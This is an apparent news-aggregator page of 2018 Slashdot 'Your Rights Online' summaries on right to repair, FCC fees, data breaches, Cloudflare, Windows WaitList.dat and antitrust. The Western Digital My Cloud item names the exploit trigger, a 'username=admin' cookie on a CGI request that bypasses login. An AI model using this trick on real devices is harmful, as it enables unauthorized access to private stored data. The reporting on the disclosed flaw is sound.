aggregator

Did John Deere Just Swindle California's Farmers Out of Their Right to Repair?

Slashdot - Your Rights Online - So, 2018-09-22 18:34
An anonymous reader quotes a new Wired opinion piece by Kyle Wiens and Elizabeth Chamberlain from iFixit: A big California farmers' lobbying group just blithely signed away farmers' right to access or modify the source code of any farm equipment software. As an organization representing 2.5 million California agriculture jobs, the California Farm Bureau gave up the right to purchase repair parts without going through a dealer. Farmers can't change engine settings, can't retrofit old equipment with new features, and can't modify their tractors to meet new environmental standards on their own. Worse, the lobbyists are calling it a victory.... John Deere and friends had already made every single "concession" earlier this year... Just after the California bill was introduced, the farm equipment manufacturers started circulating a flyer titled "Manufacturers and Dealers Support Commonsense Repair Solutions." In that document, they promised to provide manuals, guides, and other information by model year 2021. But the flyer insisted upon a distinction between a right to repair a vehicle and a right to modify software, a distinction that gets murky when software controls all of a tractor's operations. As Jason Koebler of Motherboard reported, that flyer is strikingly similar -- in some cases, identical word-for-word -- to the agreement the Farm Bureau just brokered... Instead of presenting a unified right-to-repair front, this milquetoast agreement muddies the conversation. More worryingly, it could cement a cultural precedent for electronics manufacturers who want to block third-party repair technicians from accessing a device's software.

Read more of this story at Slashdot.

Mystery Solved: FBI Closed New Mexico Observatory to Investigate Child Porn

Slashdot - Your Rights Online - So, 2018-09-22 16:34
"The mysterious 11-day closure of a New Mexico solar observatory stemmed from an FBI investigation of a janitor suspected of using the facility's wireless internet service to send and receive child pornography, federal court documents showed..." An anonymous reader quotes the Washington Post: In July, FBI agents investigating child sexual exploitation traced the location of several IP addresses linked to child pornography activity to the observatory, according to a 39-page search warrant application. During an interview with federal authorities on Aug. 21, the facility's chief observer said he had found, on a number of occasions, the same laptop hidden and running in various seldom-used offices around the observatory. He described the contents of the laptop as "not good," according to court documents. A federal agent immediately went to the observatory, located deep within Lincoln National Forest, and took the laptop into evidence... Aside from continuing to "feverishly" search the facility, the documents state that the janitor said, "it was only a matter of time before the facility 'got hit,'" and that he "believed there was a serial killer in the area, and that he was fearful that the killer might enter the facility and execute someone." In response to the janitor's behavior, the management of the observatory, without input from the FBI, shut it down and evacuated its personnel. The facility's cleaning contract with the janitor's parents was also terminated. The warrant application specified that the janitor "has a key to the building and unlimited access to the building, and is familiar with which offices are used only a handful of times a year." It also says that the janitor was the only person in the facility at the time of the alleged downloads.

Read more of this story at Slashdot.

FCC Angers Cities, Towns With $2 Billion Giveaway To Wireless Carriers

Slashdot - Your Rights Online - So, 2018-09-22 02:03
An anonymous reader quotes a report from Ars Technica: The Federal Communications Commission's plan for spurring 5G wireless deployment will prevent city and town governments from charging carriers about $2 billion worth of fees. The FCC proposal, to be voted on at its meeting on September 26, limits the amount that local governments may charge carriers for placing 5G equipment such as small cells on poles, traffic lights, and other government property in public rights-of-way. The proposal, which is supported by the FCC's Republican majority, would also force cities and towns to act on carrier applications within 60 or 90 days. The FCC says this will spur more deployment of small cells, which "have antennas often no larger than a small backpack." But the commission's proposal doesn't require carriers to build in areas where they wouldn't have done so anyway. The FCC plan proposes up-front application fees of $100 for each small cell and annual fees of up to $270 per small cell. The FCC says this is a "reasonable approximation of [localities'] costs for processing applications and for managing deployments in the rights-of-way." Cities that charge more than that would likely face litigation from carriers and would have to prove that the fees are a reasonable approximation of all costs and "non-discriminatory." But, according to Philadelphia, those proposed fees "are simply de minimis when measured against the costs that the City incurs to approve, support, and maintain the many small cell and distributed antenna system (DAS) installations in its public rights-of-way." Philadelphia said it "has already established a fee structure and online application process to apply for small cell deployment that has served the needs of its citizens without prohibiting or creating barriers to entry for infrastructure investment." The city has also negotiated license agreements for small cell installations with Verizon, AT&T, and other carriers. In addition to Philadelphia, the Rural County Represenatives of California (RCRC), a group representing 35 rural California counties, also objects to the FCC plan. They told the FCC that its "proposed recurring fee structure is an unreasonable overreach that will harm local policy innovation." "That is why many local governments have worked to negotiate fair agreements with wireless providers, which may exceed that number or provide additional benefits to the community," the RCRC wrote. "The FCC's decision to prohibit municipalities' ability to require 'in-kind' conditions on installation agreements is in direct conflict with the FCC's stated intent of this Order and further constrains local governments in deploying wireless services to historically underserved areas."

Read more of this story at Slashdot.

Magic Leap is Pushing To Land a Contract With US Army To Build AR Devices For Soldiers To Use On Combat Missions, Documents Reveal

Slashdot - Your Rights Online - Pt, 2018-09-21 22:00
Magic Leap, a US-based startup valued at north of $6 billion and which counts Google, Alibaba, Warner Bros, AT&T, and several top Silicon Valley venture capital firms as its investors, is pushing to land a contract with the U.S. Army to build augmented-reality devices for soldiers to use on combat missions, Bloomberg reported Friday, citing government documents and interviews with people familiar with the process. From the report: The contract, which could eventually lead to the military purchasing over 100,000 headsets as part of a program whose total cost could exceed $500 million, is intended to "increase lethality by enhancing the ability to detect, decide and engage before the enemy," according to an Army description of the program. A large government contract could alter the course of the highest-profile startup working on augmented reality, at a time when prospects to produce a consumer device remain uncertain. Building tools to make soldiers more deadly is a far cry from the nascent consumer market for augmented reality. But the army's program has also drawn interest from Microsoft, whose HoloLens is Magic Leap's main rival. The commercial-grade versions of both devices still face significant technological hurdles, and its not clear the companies can fulfil the army's technical requirements. If recent history is any guide, a large military contract is also sure to be controversial within the companies. Last month, Magic Leap unveiled its much-hyped AR device to the press and select developers.

Read more of this story at Slashdot.

Twitter Notifies Developers About API Bug That Shared DMs With Wrong Developers

Slashdot - Your Rights Online - Pt, 2018-09-21 21:25
Twitter has started notifying developers today about an API bug that accidentally shared direct messages (private messages) or protected tweets from a Twitter business account with other developers. From a report: According to a support page published today, Twitter said the bug only manifested for Twitter business accounts where the account owner used the Account Activity API (AAAPI) to allow other developers access to that account's data. Because of the bug, the AAAPI sent DMs and protected tweets to the wrong person instead of the authorized developer. Twitter said it discovered the bug on September 10, and fixed it the same day. They also said the bug was active between May 2017 and September 2018, for almost 16 months. The bug represents a serious privacy issue, especially for Twitter business accounts that use DMs to handle customer complaints that in some cases may include private user information.

Read more of this story at Slashdot.

Romanian Ransomware Suspect Pleads Guilty To Hacking CCTVs in Washington DC

Slashdot - Your Rights Online - Pt, 2018-09-21 20:45
gosand writes: The Register reports that "a Romanian woman has admitted running a ransomware operation from infected Washington DC's CCTV systems just days before President Trump was sworn into office in the US capital." The US DOJ stated that "this case was of the highest priority due to its impact on the Secret Service's protective mission and its potential effect on the security plan for the 2017 Presidential Inauguration." She could face a maximum of 25 years if convicted. She and her cohort (who is still jailed in Romania) made the classic hacker mistake of using their personal gmail accounts for the campaign, even accessing them from one of the compromised PCs.

Read more of this story at Slashdot.

Apple Will Judge Call, Email Activity To Assign Users a 'Trust Score'

Slashdot - Your Rights Online - Pt, 2018-09-21 03:30
Apple recently updated its iTunes privacy policy page, making mention of a "trust score" it gives iPhone users on how they make calls or send emails. The INQUIRER reports: "To help identify and prevent fraud, information about how you use your device, including the approximate number of phone calls or emails you send and receive, will be used to compute a device trust score when you attempt a purchase," Apple explained. "The submissions are designed so Apple cannot learn the real values on your device. The scores are stored for a fixed time on our servers." In practical terms, the Cupertino crew will only look at Apple account usage patterns and hoover up metadata rather than more personal, and potentially damning information. [T]he data collection and trust score assigning should help Apple better spot and dodgy activity going on in Apple accounts that aren't in keeping with those of the legitimate users. [I]t's not entirely clear how Apple will use the metadata to actually spot fraud, as it hasn't explained its workings.

Read more of this story at Slashdot.

Amazon Plants Fake Packages In Delivery Trucks As Part of Undercover Ploy To 'Trap' Drivers Stealing

Slashdot - Your Rights Online - Pt, 2018-09-21 00:10
An anonymous reader quotes a report from Business Insider: Amazon uses fake packages to catch delivery drivers who are stealing, according to sources with knowledge of the practice. The company plants the packages -- internally referred to as "dummy" packages -- in the trucks of drivers at random. The dummy packages have fake labels and are often empty. Here's how the practice works, according to the sources: During deliveries, drivers scan the labels of every package they deliver. When they scan a fake label on a dummy package, an error message will pop up. When this happens, drivers might call their supervisors to address the problem, or keep the package in their truck and return it to an Amazon warehouse at the end of their shift. Drivers, in theory, could also choose to steal the package. The error message means the package isn't detected in Amazon's system. As a result, it could go unnoticed if the package were to go missing. "If you bring the package back, you are innocent. If you don't, you're a thug," said Sid Shah, a former manager for DeliverOL, a courier company that delivers packages for Amazon.

Read more of this story at Slashdot.

The New York Times Sues FCC For Net Neutrality Records

Slashdot - Your Rights Online - Cz, 2018-09-20 21:45
The New York Times Company on Thursday filed a lawsuit against the Federal Communications Commission (FCC) concerning records the newspaper alleges may shed light on possible Russian participation in a public comment period before the commission rolled back Obama-era net neutrality rules. Bloomberg reports: The plaintiffs, including Times reporter Nicholas Confessore and investigations editor Gabriel Dance, filed in the U.S. District Court for the Southern District of New York Sept. 20 under the Freedom of Information Act, seeking to compel the commission to hand over data. "The request at issue in this litigation involves records that will shed light on the extent to which Russian nationals and agents of the Russian government have interfered with the agency notice-and-comment process about a topic of extensive public interest: the government's decision to abandon 'net neutrality,'" the plaintiffs alleged.

Read more of this story at Slashdot.

Google Defends Gmail Data Sharing, Gives Few Details on Violations

Slashdot - Your Rights Online - Cz, 2018-09-20 20:40
Google defended how it polices third-party add-ons for Gmail in a letter to U.S. senators made public on Thursday, saying that upfront review catches the "majority" of bad actors. A report adds: Google said it uses automated scans and reports from security researchers to monitor third parties with access to Gmail data, but gave no details on how many add-ons have been caught violating its policies. Google's privacy practices have been under growing scrutiny. The Senate Commerce Committee has a hearing scheduled for Sept. 26 to question Google, Apple, AT&T, Twitter about their consumer data privacy practices. Gmail, the Google email service used by 1.4 billion people, enables add-on developers access to users' emails and the ability to share that data with other parties as "long as they are transparent" with users about how they are using data and get consent, Google said in the letter. For instance, a program that logs receipts could be allowed to scan Gmail as it searches for receipts.

Read more of this story at Slashdot.

Equifax Slapped With UK's Maximum Penalty Over 2017 Data Breach

Slashdot - Your Rights Online - Cz, 2018-09-20 17:50
Credit rating giant Equifax has been issued with the maximum possible penalty by the UK's data protection agency for last year's massive data breach. From a report: Albeit, the fine is only 500,000 Pound (roughly $658,000) because the loss of customer data occurred when the UK's prior privacy regime was in force -- rather than the tough new data protection law, brought in via the EU's GDPR, which allows for maximum penalties of as much as 4% of a company's global turnover for the most serious data failures. So, again, Equifax has managed to dodge worse consequences over the 2017 breach, despite the hack resulting from its own internal process failings after it failed to patch a server that was known to be vulnerable for months -- thereby giving hackers a soft-spot to attack and swipe data on 147 million consumers. Personal information that was lost or compromised in the 2017 Equifax breach included names and dates of birth, addresses, passwords, driving licence and financial details.

Read more of this story at Slashdot.

Cloudflare Ends CAPTCHAs For Tor Users

Slashdot - Your Rights Online - Cz, 2018-09-20 17:10
Cloudflare announced on Monday a new service named the "Cloudflare Onion Service" that can distinguish between bots and legitimate Tor traffic. The main advantage of this new service is, said Cloudflare, that Tor users will see far less, or even no CAPTCHAs when accessing a Cloudflare-protected website via the Tor Browser. A reader writes: The new Cloudflare Onion Service needed the Tor team to make "a small tweak in the Tor binary," hence it will only work with recent versions of the Tor Browser -- the Tor Browser 8.0 and the new Tor Browser for Android, both launched earlier this month. Tor users have been complaining about seeing too many CAPTCHAs when accessing a Cloudflare-protect site for years now. In February 2016, Tor Project administrators went as far as to accuse Cloudflare of "sabotaging Tor traffic" by forcing Tor users to solve CAPTCHA fields ten times or more, in some cases. Cloudflare responded to accusations a month later, claiming the company was only showing CAPTCHAs because 94 percent of all Tor traffic was either automated bots or originating from malicious actors. Half a year later, in October 2016, Cloudflare started looking into methods of removing CAPTCHAS for Tor users. Their first foray was the Challenge Bypass Specification and a Tor Browser extension, but that project didn't go too far, and has been eventually replaced by the new Cloudflare Onion Service today.

Read more of this story at Slashdot.

US Senate Staff Targeted By State-Backed Hackers, Senator Says

Slashdot - Your Rights Online - Cz, 2018-09-20 15:00
An anonymous reader quotes a report from PBS NewsHour: Sen. Ron Wyden, an Oregon Democrat, said in a Wednesday letter to Senate leaders that his office discovered that "at least one major technology company" has warned an unspecified number of senators and aides that their personal email accounts were "targeted by foreign government hackers." Similar methods were employed by Russian military agents who leaked the contents of private email inboxes to influence the 2016 elections. Wyden did not specify the timing of the notifications, but a Senate staffer said they occurred "in the last few weeks or months." But the senator said the Office of the Sergeant at Arms, which oversees Senate security, informed legislators and staffers that it has no authority to help secure personal, rather than official, accounts. "This must change," Wyden wrote in the letter. "The November election grows ever closer, Russia continues its attacks on our democracy, and the Senate simply does not have the luxury of further delays."

Read more of this story at Slashdot.

California May Ban Terrible Default Passwords On Connected Devices

Slashdot - Your Rights Online - Cz, 2018-09-20 12:00
According to Engadget, the California Senate has sent Governor Jerry Brown draft legislation that would require manufacturers to either have to use unique preprogrammed passwords or make you change the credentials the first time you use it. "Companies will also have to 'equip the device with a reasonable security feature or features that are appropriate to the nature and function of the device,'" reports Engadget. From the report: If Brown signs the bill into law, it will take effect at the beginning of 2020. But critics claim the wording is vague and doesn't go far enough in ensuring manufacturers don't include unsecured features. "It's like dieting, where people insist you should eat more kale, which does little to address the problem you are pigging out on potato chips," Robert Graham of Errata Security said in a blog post. "The key to dieting is not eating more but eating less." Given the huge number of connected devices available, it's also not clear how the state plans to enforce and regulate the rules.

Read more of this story at Slashdot.

'WaitList.dat' Windows File May Be Secretly Hoarding Your Passwords, Emails

Slashdot - Your Rights Online - Cz, 2018-09-20 00:40
A file named WaitList.dat, found only on touchscreen-capable Windows PCs, may be collecting your sensitive data like passwords and emails. According to ZDNet, in order for the file to exist users have to enable "the handwriting recognition feature that automatically translates stylus/touchscreen scribbles into formatted text." From the report: The handwriting to formatted text conversion feature has been added in Windows 8, which means the WaitList.dat file has been around for years. The role of this file is to store text to help Windows improve its handwriting recognition feature, in order to recognize and suggest corrections or words a user is using more often than others. "In my testing, population of WaitList.dat commences after you begin using handwriting gestures," [Digital Forensics and Incident Response expert Barnaby Skeggs] told ZDNet in an interview. "This 'flicks the switch' (registry key) to turn the text harvester functionality (which generates WaitList.dat) on." "Once it is on, text from every document and email which is indexed by the Windows Search Indexer service is stored in WaitList.dat. Not just the files interacted via the touchscreen writing feature," Skeggs says. Since the Windows Search Indexer service powers the system-wide Windows Search functionality, this means data from all text-based files found on a computer, such as emails or Office documents, is gathered inside the WaitList.dat file. This doesn't include only metadata, but the actual document's text. "The user doesn't even have to open the file/email, so long as there is a copy of the file on disk, and the file's format is supported by the Microsoft Search Indexer service," Skeggs told ZDNet. "On my PC, and in my many test cases, WaitList.dat contained a text extract of every document or email file on the system, even if the source file had since been deleted," the researcher added. Furthermore, Skeggs says WaitList.dat can be used to recover text from deleted documents.

Read more of this story at Slashdot.

'I'm Admin. You're Admin. Everyone is Admin.' Remote Access Bug Turns Western Digital My Cloud Into Everyone's Cloud

Slashdot - Your Rights Online - Cz, 2018-09-20 00:00
Researchers at infosec shop Securify revealed this week a vulnerability, designated CVE-2018-17153, which allows an unauthenticated attacker with network access to the device to bypass password checks and login with admin privileges. From a report:This would, in turn, give the attacker full control over the NAS device, including the ability to view and copy all stored data as well as overwrite and erase contents. If the box is accessible from the public internet, it could be remotely pwned, it appears. Alternatively, malware on a PC on the local network could search for and find a vulnerable My Cloud machine, and compromise it. According to Securify, the flaw itself lies in the way My Cloud creates admin sessions that are attached to an IP address. When an attacker sends a command to the device's web interface, as an HTTP CGI request, they can also include the cookie username=admin -- which unlocks admin access. Thus if properly constructed, the request would establish an admin login session to the device without ever asking for a password. In other words, just tell it you're the admin user in the cookie, and you're in. The researcher told TechCrunch that he reported the vulnerability to Western Digital last year, but the company "stopped responding."

Read more of this story at Slashdot.

Cloudflare Wants Internet Route Leaks To Be a Thing of the Past

Slashdot - Your Rights Online - Śr, 2018-09-19 20:45
Cloudflare wants routing issues to be a thing of the past by deploying a new feature to try to stop route leaks and hijacks in their tracks. From a report: Cloudflare told TechCrunch that rolling out resource public key infrastructure (RPKI) to all of its customers for free will make it far more difficult to reroute traffic -- either by accident or deliberately. RPKI, in a nutshell, helps to ensure that traffic goes to the right place through a route that's verified as legitimate and correct by using cryptographically signed certificates. "When two networks connect with each other -- say, AT&T and Verizon -- they announce the set of IP addresses for which they should be sent traffic," said Nick Sullivan, Cloudflare's head of cryptography. "The RPKI is a security framework to make sure a network announces only its legitimate IP addresses." Cloudflare's push in the right direction follows an effort by the National Institute for Standards and Technology, which last week published its first draft of a new standard, which incorporates RPKI as one of three components that will help prevent route leaks and hijacks. A possible approval is expected in the coming weeks.

Read more of this story at Slashdot.

Hackers Stole Customer Credit Cards in Newegg Data Breach

Slashdot - Your Rights Online - Śr, 2018-09-19 17:20
Newegg is clearing up its website after a month-long data breach. TechCrunch: Hackers injected 15 lines of card skimming code on the online retailer's payments page which remained for more than a month between August 14 and September 18, Yonathan Klijnsma, a threat researcher at RiskIQ, told TechCrunch. The code siphoned off credit card data from unsuspecting customers to a server controlled by the hackers with a similar domain name -- likely to avoid detection. The server even used an HTTPS certificate to blend in. The code also worked for both desktop and mobile customers -- though it's unclear if mobile customers are affected. The online electronics retailer removed the code on Tuesday after it was contacted by incident response firm Volexity, which first discovered the card skimming malware and reported its findings. Newegg is one of the largest retailers in the US, making $2.65 billion in revenue in 2016. The company touts more than 45 million monthly unique visitors, but it's not known precisely how many customers completed transactions during the period.

Read more of this story at Slashdot.

Life In the Spanish City That Banned Cars

Slashdot - Your Rights Online - Śr, 2018-09-19 15:00
An anonymous reader shares an excerpt from a report via The Guardian: People don't shout in Pontevedra -- or they shout less. With all but the most essential traffic banished, there are no revving engines or honking horns, no metallic snarl of motorbikes or the roar of people trying make themselves heard above the din -- none of the usual soundtrack of a Spanish city. What you hear in the street instead are the tweeting of birds in the camellias, the tinkle of coffee spoons and the sound of human voices. Teachers herd crocodiles of small children across town without the constant fear that one of them will stray into traffic. "Listen," says the mayor, opening the windows of his office. From the street below rises the sound of human voices. "Before I became mayor 14,000 cars passed along this street every day. More cars passed through the city in a day than there are people living here." Miguel Anxo Fernandez Lores has been mayor of the Galician city since 1999. His philosophy is simple: owning a car doesn't give you the right to occupy the public space. "How can it be that the elderly or children aren't able to use the street because of cars?" asks Cesar Mosquera, the city's head of infrastructures. "How can it be that private property -- the car -- occupies the public space?" Lores became mayor after 12 years in opposition, and within a month had pedestrianized all 300,000 sq m of the medieval centre, paving the streets with granite flagstones. "The historical center was dead," Lores says. "There were a lot of drugs, it was full of cars -- it was a marginal zone. It was a city in decline, polluted, and there were a lot of traffic accidents. It was stagnant. Most people who had a chance to leave did so. At first we thought of improving traffic conditions but couldn't come up with a workable plan. Instead we decided to take back the public space for the residents and to do this we decided to get rid of cars." Some of the benefits mentioned in the report include less traffic accidents and traffic-related deaths, and decreased CO2 emissions (70%). "Also, withholding planning permission for big shopping centers has meant that small businesses -- which elsewhere have been unable to withstand Spain's prolonged economic crisis -- have managed to stay afloat," reports The Guardian.

Read more of this story at Slashdot.

VW Group, BMW and Daimler Are Under Investigation For Collusion In Europe

Slashdot - Your Rights Online - Śr, 2018-09-19 12:00
The European Commission has launched an antitrust investigation into the Volkswagen Group, BMW and Daimler, over allegations they colluded to keep certain emissions control devices from reaching the market in Europe, according to a statement the Commission released on Tuesday. CNET reports: The technologies the group allegedly sought to bury include a selective catalytic reduction system for diesel vehicles, which would help to reduce environmentally problematic oxides of nitrogen in passenger cars, and "Otto" particulate filters that trap particulate matter from gasoline combustion engines. "The Commission is investigating whether BMW, Daimler and VW agreed not to compete against each other on the development and roll-out of important systems to reduce harmful emissions from petrol and diesel passenger cars," said Commissioner Margrethe Vestager, head of competition policy for the European Commission, in a statement. "These technologies aim at making passenger cars less damaging to the environment. If proven, this collusion may have denied consumers the opportunity to buy less polluting cars, despite the technology being available to the manufacturers."

Read more of this story at Slashdot.